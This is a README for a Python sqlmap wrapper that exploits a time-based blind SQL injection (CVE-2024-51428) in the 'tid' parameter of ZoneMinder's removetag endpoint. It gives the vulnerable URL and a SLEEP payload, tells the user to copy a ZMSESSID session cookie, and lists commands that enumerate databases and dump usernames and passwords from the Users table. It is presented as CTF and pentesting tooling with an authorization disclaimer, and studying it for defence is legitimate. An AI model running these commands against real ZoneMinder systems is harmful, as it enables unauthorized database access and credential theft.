Python wrapper for sqlmap designed to exploit CVE-2024-51428 in ZoneMinder.
This tool automates detection and exploitation of a Blind SQL Injection vulnerability while keeping the output clean and focused on useful data.
The script hides sqlmap logs and only displays relevant information such as:
- Detected injection point
- Database names
- Tables
- Dumped credentials or sensitive data
This makes the tool ideal for CTF environments, demonstrations, and security testing.
CVE: CVE-2024-51428
Type: Blind SQL Injection
Affected Software: ZoneMinder
Attack Vector: HTTP GET parameter
Parameter: tid
The vulnerability exists in the following endpoint:
/zm/index.php?view=request&request=event&action=removetag&tid=
The tid parameter is not properly sanitized before being used in a database query, allowing attackers to inject SQL queries.
The exploitation technique used is time-based blind SQL injection.
Example payload discovered by sqlmap:
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)This payload forces the database to sleep if the query is executed successfully, confirming the presence of SQL injection.
- Automatic Blind SQL Injection detection
- Database enumeration
- Table enumeration
- Table dumping
- Column filtering
- Row filtering
- Clean output (sqlmap logs hidden)
- Designed for CTF and pentesting labs
- Python 3
- sqlmap
Install sqlmap if needed:
sudo apt install sqlmapBasic syntax:
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'With this command we check if it is vulnerable or not
Example:
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'The exploit requires a valid ZoneMinder session cookie.
Steps:
- Open the target in your browser
- Open Developer Tools
- Navigate to:
Application → Cookies
- Locate the cookie named:
ZMSESSID
- Copy its value and use it with
-c
Example:
-c '151fvdqmjkhnkfat7l5epgmd22'python3 poc.py --url http://target.htb -c 'COOKIE'Example output:
[*] Checking vulnerability...
Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))
[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION
python3 poc.py --url http://target.htb -c 'COOKIE' -dExample output:
available databases [3]:
information_schema
mysql
zm
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zmExample output:
Database: zm
Users
Events
Monitors
Storage
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Userspython3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f UsernameExample:
+----------+
| Username |
+----------+
| admin |
| viewer |
+----------+
You can filter rows using:
-ff <COLUMN> <VALUE>Example:
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username markEquivalent SQL:
WHERE Username='mark'Example:
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username markInternal sqlmap command:
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dumpThe script acts as a wrapper around sqlmap.
Steps performed internally:
- Build the vulnerable endpoint
/zm/index.php?view=request&request=event&action=removetag&tid=1
- Pass the authentication cookie to sqlmap
- Execute sqlmap with optimized options:
--threads=10
--technique=T
--batch
- Parse sqlmap output in real time
- Filter out logs and display only:
- injection information
- databases
- tables
- dumped data
This tool was created for:
- Capture The Flag challenges
- Security research
- Educational purposes
- Pentesting labs
This project is provided for educational and authorized security testing purposes only.
The author is not responsible for any misuse of this tool.
Always obtain proper authorization before testing any system.
Security Research / CTF tooling